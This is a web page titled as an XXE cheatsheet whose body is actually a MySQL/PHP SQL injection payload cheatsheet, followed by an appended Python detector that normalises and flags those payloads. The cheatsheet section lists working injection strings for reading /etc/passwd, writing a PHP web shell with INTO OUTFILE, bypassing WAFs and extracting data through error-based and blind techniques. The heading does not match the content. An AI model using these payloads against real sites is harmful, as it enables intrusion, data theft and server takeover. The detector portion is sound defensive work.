XXE Cheatsheet – XML External Entity Injection. By HollyGraceful, May 16, 2015 / February 2, 2020. (Cheat Sheets / Infrastructure / Web Application Security)
Slack3rsecurity’s SQL injection cheatsheet 2011.
Hello world! I have decided to write a cheatsheet containing all that I have learnt from 2 years in the web application security field. In this post I will be focusing on SQL injection in regards to a PHP/MySQL environment.
Comments
/* */ – Multi-line comment.
# – Single-line comment.
-- – Single-line comment (MySQL requires whitespace after the two dashes, which is why payloads end in "-- " or "--+").
/*! */ – MySQL executable ("special") comments; the contents are parsed as SQL by MySQL but ignored by other parsers.
Whitespace alternatives.
+, %2B, %20, %09, %0d, %0A, /**/, /*foo*/
Global system variables and functions
@@datadir //MySQL data directory.
@@version_compile_os //OS MySQL is running on.
@@version //MySQL database version.
user() //Current database user.
@@log_error //Path to the error log.
database() //Current database.
Columns in a SELECT.
file.php?var=1 order by 10-- //Unknown column '10' in 'order clause'
file.php?var=1 and(select * from table)=(1)-- //Operand should contain 9 column(s)
Encoding. //For matching collations.
file.php?var=1 union select cast(version() as char character set latin1)-- //5.0.11
file.php?var=1 union select convert(version() using binary)-- //5.0.11
file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
file.php?var=1 union select unhex(hex(version()))-- //5.0.11
File_priv.
file.php?var=1 union select user()-- //Checking the current user. root@localhost
file.php?var=1 union select file_priv from mysql.user where user='root'-- //Checking for the FILE privilege on the current user, Y=Yes N=No.
file.php?var=1 union select load_file('/etc/passwd')-- //Loading system files.
file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file('/etc/passwd')),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)-- //Loading system files with error-based injection.
file.php?var=1 union select "<?php system($_GET[c]);?>" into outfile '/dir/dir/shell.php'-- //Write code to a file.
file.php?var=1 limit 1 into outfile '/dir/dir/shell.php' lines terminated by "<?php system($_GET[c]);?>"--+ //Write to a file.
WAF & security bypasses.
file.php?var=1 /*!union*/ /*!select*/ version()-- //MySQL executable comments.
file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass: a filter that strips each keyword once leaves "union select" behind.
file.php?var=1/**/union/**/select/**/version()-- //Whitespace bypass.
file.php?var=1 UnION SElecT version()-- //Mixed upper/lower case.
file.php?var=1 uni/**/on sel/**/ect version()-- //Comments inside keywords.
file.php?var=1 uni%6Fn select version()-- //URL encoding.
file.php?var=1 %252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- //Double URL encoding, taking advantage of a WAF that only decodes input once.
file.php?var=1 0x414141414141414141414141414141414141 union select version()-- //Buffer overflow.
file.php?var=1 union select 0x3a3a3a-- //Hex encoding to bypass magic quotes.
Extracting data from MySQL errors.
rand()
file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1)--
file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat((select users.password),0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1)--
name_const() (MySQL 5.0.12 to 5.0.64)
file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--
extractvalue() & updatexml() (MySQL 5.1+)
file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))-- //XPath error
file.php?var=1 and updatexml(rand(),concat(0x3a,version()),1)-- //XPath error
Misc.
file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits BlackFan.
file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a-- //Duplicate column name error.
Injecting into an ORDER BY
file.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
file.php?var=1,ExtractValue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)))--
Blind.
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1))>=100,1,BENCHMARK(2000000,MD5(NOW())))-- //Time-based BSQLi
file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3))-- //Time-based BSQLi
file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,.,",\',~,`,|,{,},[,],:,;, ,')),1,1) FROM information_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5))-- //BSQLi using bit shifting, credits to http://www.websec.ca
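Defender's-side worked example, added here and not part of Slack3rsecurity's cheatsheet: a Python normaliser that undoes the tricks from the "WAF & security bypasses" section (double URL encoding, inline and executable comments, mixed case, nested keywords such as unUNIONion) before matching, plus signatures for the error-based (rand/extractvalue/updatexml/name_const), time-based (SLEEP/BENCHMARK) and file-access (load_file/into outfile) forms from the later sections. The sample parameter values are constructed to resemble the payloads above and are not real traffic; the function names, signature labels and the decode-round limit are choices made for this example. It also shows why a filter that deletes each keyword once (naive_keyword_strip) is the wrong design.

```python
import re
import urllib.parse

# Keywords whose nested form ("unUNIONion") survives a filter that deletes
# each keyword once. unnest_keywords() reverses that trick before matching.
KEYWORDS = ("union", "select", "from", "where")

# Detection signatures applied to the normalised parameter.
# The labels are hypothetical names chosen for this example.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s*\bselect\b")),
    ("error_based_xpath", re.compile(r"\b(?:extractvalue|updatexml)\s*\(")),
    ("error_based_rand", re.compile(r"\bfloor\s*\(\s*rand\s*\(")),
    ("error_based_name_const", re.compile(r"\bname_const\s*\(")),
    ("time_based", re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("file_access", re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b")),
]


def fully_decode(value, max_rounds=8):
    """URL-decode until the string stops changing (bounded), so %252f ends up as '/'.
    '+' and %2B both become a space, matching the whitespace list in the cheatsheet."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def unnest_keywords(text):
    """Collapse a keyword wrapped around a copy of itself (ununionion -> union)."""
    for kw in KEYWORDS:
        for i in range(1, len(kw)):
            pattern = re.escape(kw[:i]) + "(?:" + re.escape(kw) + ")+" + re.escape(kw[i:])
            text = re.sub(pattern, kw, text)
    return text


def normalize(param, max_decode_rounds=8):
    """Return the forms of the parameter a detector should inspect."""
    text = fully_decode(param, max_decode_rounds).lower()
    # MySQL executes /*!...*/ and /*!50000...*/ comments, so their content is kept.
    text = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", text, flags=re.S)
    variants = []
    # Plain comments are whitespace to the parser ("union/**/select"), but some
    # payloads use them to split a keyword ("uni/**/on"); inspect both readings.
    for replacement in (" ", ""):
        v = re.sub(r"/\*.*?\*/", replacement, text, flags=re.S)
        v = unnest_keywords(v)
        v = re.sub(r"\s+", " ", v).strip()
        variants.append(v)
    return variants


def classify(param, max_decode_rounds=8):
    """Names of the signatures that fire on any normalised form of the parameter."""
    variants = normalize(param, max_decode_rounds)
    return [name for name, rx in SIGNATURES if any(rx.search(v) for v in variants)]


def naive_keyword_strip(param):
    """The kind of filter the nested-keyword payload defeats: each keyword deleted once."""
    for kw in KEYWORDS:
        param = re.sub(kw, "", param, count=1, flags=re.I)
    return param


# Constructed sample parameter values modelled on the cheatsheet's payloads (not real traffic).
SAMPLES = {
    "benign_id": "1",
    "benign_text": "union station",
    "exec_comment": "1 /*!union*/ /*!50000select*/ version()--",
    "nested_keyword": "1 unUNIONion seleSELECTct version()--",
    "comment_space": "1/**/union/**/select/**/version()--",
    "mixed_case": "1 UnION SElecT version()--",
    "split_keyword": "1 uni/**/on sel/**/ect version()--",
    "url_encoded": "1 uni%6Fn select version()--",
    "double_encoded": "1%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--",
    "xpath_error": "1 and extractvalue(rand(),concat(0x3a,version()))--",
    "rand_error": "1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--",
    "time_based": "1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3))--",
    "file_read": "1 union select load_file('/etc/passwd')--",
}


def scan_samples():
    """Classify every sample; benign ones come back with an empty list."""
    return {name: classify(value) for name, value in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name:16} -> {hits or 'clean'}")
    print("naive strip leaves:", naive_keyword_strip("unUNIONion seleSELECTct"))
```

The two design points worth keeping: decode to a fixed point rather than once (classify(..., max_decode_rounds=1) misses the double-encoded sample, which is exactly the single-decode WAF weakness above), and match keywords after normalising instead of deleting them, since deletion is what turns unUNIONion into union.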
Have a question or something you have to add? Shoot me a message.
Helpful links.
http://www.websec.wordpress.com //Great blog & good posts on web application security.